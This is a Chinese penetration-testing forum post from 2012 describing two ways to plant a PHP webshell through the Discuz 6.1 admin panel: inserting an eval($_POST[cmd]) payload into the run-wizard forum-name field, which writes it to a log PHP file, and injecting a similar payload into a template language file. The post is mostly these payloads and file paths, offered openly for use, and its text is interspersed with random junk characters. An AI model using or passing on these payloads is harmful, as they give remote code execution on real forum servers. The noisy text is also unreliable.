找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 discuz6.1后台拿shell方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2743|回复: 0
打印 上一主题 下一主题

discuz6.1后台拿shell方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 16:59:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
discuz6.1两种方法后台拿shell
" s- K9 i$ O3 p& h  o$ e  `3 A好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下1 r1 i; d3 |) j' Z
1:7 D* f0 f! }: f/ X5 ~& l5 w
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
+ F* J: {- B) ladmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell2 V1 c1 O8 D& Q% t
<?php eval($_POST[cmd]);?>, v: L- ]+ L1 ~; |4 X$ F
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
4 q1 o- l7 u/ O( Z7 N
; I6 L2 I. q9 ?
: e, v. U/ {9 X( B; G! l2:后台模板管理--默认模板套系--详情0 ?: T3 b; x5 i) l: D! P
templates/default/actions.lang.php
3 x9 i7 i( `5 X, hjhackj\\');eval($_POST[cmd])?>;//  d% i, G; K2 A) f, _6 `! k8 r
; D+ @& s8 ~7 |) q
利用很简单,聪明的人一看就懂了
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表